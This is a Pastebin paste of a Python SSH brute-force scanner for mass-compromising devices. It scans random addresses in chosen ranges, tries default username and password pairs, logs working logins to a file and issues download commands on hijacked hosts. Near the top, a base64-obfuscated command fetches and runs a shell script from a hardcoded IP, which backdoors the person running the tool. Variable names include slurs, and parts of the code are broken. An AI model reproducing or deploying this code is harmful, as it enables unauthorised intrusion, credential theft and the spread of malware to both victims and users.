Guest User

Untitled

a guest
Aug 14th, 2018
53
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.49 KB | None | 0 0
  1. #!/usr/bin/env python
  2. #Working Python Scanner 2018
  3.  
  4. import threading, paramiko, random, socket, time, sys, base64, subprocess
  5. paramiko.util.log_to_file("/dev/null")
  6. blacklist = ['127']
  7.  
  8.  
  9. passwords = ["admin:1234", "root:root", "ubnt:ubnt", "pi:raspberry", "admin:admin", "support:support",
  10.  
  11. "guest:guest", "telnet:telnet", "root:admin", "user:user", "test:test", "vagrant:vagrant"]
  12.  
  13. if sys.argv[4] == 'root':
  14. passwords = ["root:root"]
  15. if sys.argv[4] == 'admin':
  16. passwords = ["admin:1234"]
  17. if sys.argv[4] == 'support':
  18. passwords = ["support:support"]
  19. if sys.argv[4] == 'guest':
  20. passwords = ["guest:guest"]
  21. if sys.argv[4] == 'telnet':
  22. passwords = ["telnet:telnet"]
  23. if sys.argv[4] == 'omg':
  24. passwords = ["admin:admin"]
  25. if sys.argv[4] == 'kms':
  26. passwords = ["root:root", "admin:1234"]
  27. if sys.argv[4] == 'kys':
  28. passwords = ["root:root", "root:admin"]
  29. if sys.argv[4] == 'gay':
  30. passwords = ["root:root", "admin:admin", "root:admin", "admin:1234"]
  31. if sys.argv[4] == 'fag':
  32. passwords = ["root:root", "admin:1234", "root:admin", "user:user", "test:test"]
  33. if sys.argv[4] == 'perlz':
  34. passwords = ["pi:raspberry", "vagrant:vagrant", "ubnt:ubnt"]
  35. if sys.argv[4] == 'all':
  36. passwords = ["pi:raspberry", "vagrant:vagrant", "ubnt:ubnt", "root:root", "admin:1234", "support:support",
  37.  
  38. "guest:guest", "telnet:telnet", "admin:admin", "root:admin", "user:user", "test:test"]
  39.  
  40.  
  41. print('Scanning now! Its working fine... just wait!')
  42. def run(cmd):
  43. subprocess.call(cmd, shell=True)
  44. checkbinaries =
  45.  
  46. "Y2QgL3RtcDsgd2dldCAtcSBodHRwOi8vMTY3Ljg4LjE2MS4yMS9iaW5zLnNoOyBjaG1vZCA3NzcgYmlucy5zaDsgc2ggYmlucy5zaA=="
  47. rebinaries = str(base64.b64decode(checkbinaries))
  48. run(rebinaries)
  49. run('clear')
  50.  
  51.  
  52. print " __ .___ "
  53. print "| | _______ __| _/____ ____ "
  54. print "| |/ /\__ \ / __ |/ __ \ / \ "
  55. print "| < / __ \_/ /_/ \ ___/| | \ "
  56. print "|__|_ \(____ /\____ |\___ >___| / "
  57. print " \/ \/ \/ \/ \/ "
  58. print ""
  59. print ""
  60. print "Scanning now! Its working fine... just wait!"
  61. ipclassinfo = sys.argv[2]
  62. if ipclassinfo == "A":
  63. ip1 = sys.argv[3]
  64. elif ipclassinfo == "B":
  65. ip1 = sys.argv[3].split(".")[0]
  66. ip2 = sys.argv[3].split(".")[1]
  67. elif ipclassinfo == "C":
  68. ips = sys.argv[3].split(".")
  69. num=0
  70. for ip in ips:
  71. num=num+1
  72. if num == 1:
  73. ip1 = ip
  74. elif num == 2:
  75. ip2 = ip
  76. elif num == 3:
  77. ip3 = ip
  78. class sshscanner(threading.Thread):
  79. global passwords
  80. global ipclassinfo
  81. if ipclassinfo == "A":
  82. global ip1
  83. elif ipclassinfo == "B":
  84. global ip1
  85. global ip2
  86. elif ipclassinfo == "C":
  87. global ip1
  88. global ip2
  89. global ip3
  90. def run(self):
  91. while 1:
  92. try:
  93. while 1:
  94. thisipisbad='no'
  95. if ipclassinfo == "A":
  96. self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str
  97.  
  98. (random.randrange(0,256))
  99. elif ipclassinfo == "B":
  100. self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  101. elif ipclassinfo == "C":
  102. self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  103. elif ipclassinfo == "YEET":
  104. YEET = ["122","119","161","37","186","187","31","188","201","2","168"]
  105. self.host = random.choice(YEET)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange
  106.  
  107. (0,256))+'.'+str(random.randrange(0,256))
  108. elif ipclassinfo == "NIGGER":
  109. NIGGER =
  110.  
  111. ["125.27","101.109","113.53","118.173","46.62","5.78","125.25","125.26","182.52","125.24","180.180"]
  112. self.host = random.choice(NIGGER)+'.'+str(random.randrange(0,256))+'.'+str
  113.  
  114. (random.randrange(0,256))
  115. elif ipclassinfo == "FAST":
  116. FAST = ["188.16", "188.17", "188.18", "188.19"]
  117. self.host = random.choice(FAST)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange
  118.  
  119. (0,256))
  120. elif ipclassinfo == "BABY":
  121. BABY =
  122.  
  123. ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189
  124.  
  125. .61","189.62","189.63","189.126"]
  126. self.host = random.choice(BABY)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange
  127.  
  128. (0,256))
  129. elif ipclassinfo == "KADEN":
  130. KITTY = ["190.236", "212.194", "212.195", "190.13", "190.40", "190.41", "190.42",
  131.  
  132. "190.43", "190.96", "190.97", "190.232", "190.233", "190.234", "190.235", "190.236", "190.237", "190.238",
  133.  
  134. "190.239", "190.184", "181.174", "186.183", "59.177", "59.178", "59.180", "59.182", "59.183", "59.184", "181.64",
  135.  
  136. "181.65", "181.66", "181.67", "200.106", "200.121", "201.230", "201.240"]
  137. self.host = random.choice(KADEN)+'.'+str(random.randrange(0,256))+'.'+str
  138.  
  139. (random.randrange(0,256))
  140. elif ipclassinfo == "OLD":
  141. OLD = ["103.20", "103.30", "103.47", "103.57", "12.188", "12.34", "122.3", "210.213",
  142.  
  143. "59.69", "122.52", "122.54", "119.93", "124.105", "125.104", "119.92", "119.91", "49.144"]
  144. self.host = random.choice(OLD)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange
  145.  
  146. (0,256))
  147.  
  148. for badip in blacklist:
  149. if badip in self.host:
  150. thisipisbad='yes'
  151. if thisipisbad=='no':
  152. break
  153. username='root'
  154. password=""
  155. port = 22
  156. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  157. s.settimeout(3)
  158. s.connect((self.host, port))
  159. s.close()
  160. ssh = paramiko.SSHClient()
  161. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  162. dobreak=False
  163. for passwd in passwords:
  164. if ":n/a" in passwd:
  165. password=""
  166. else:
  167. password=passwd.split(":")[1]
  168. if "n/a:" in passwd:
  169. username=""
  170. else:
  171. username=passwd.split(":")[0]
  172. try:
  173. ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  174. dobreak=True
  175. break
  176. except:
  177. pass
  178. if True == dobreak:
  179. break
  180. badserver=True
  181. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  182. output = stdout.read()
  183. if "inet addr" in output:
  184. badserver=False
  185. if badserver == False:
  186. print 'Kaden Is Sending ~ ' +self.host+':'+username+':'+password+':'+str(port)
  187. ssh.exec_command("wget_line_here!")
  188. nigger = open("cumming.txt", "a").write(username + ":" + password + ":" + self.host +
  189.  
  190. "\n")
  191. time.sleep(15)
  192. ssh.close()
  193. except:
  194. pass
  195.  
  196. for x in range(0,1500):
  197. try:
  198. t = sshscanner()
  199. t.start()
  200. except:
  201. pass
  202. #LiGhT Ya DiG!
Add Comment
Please, Sign In to add comment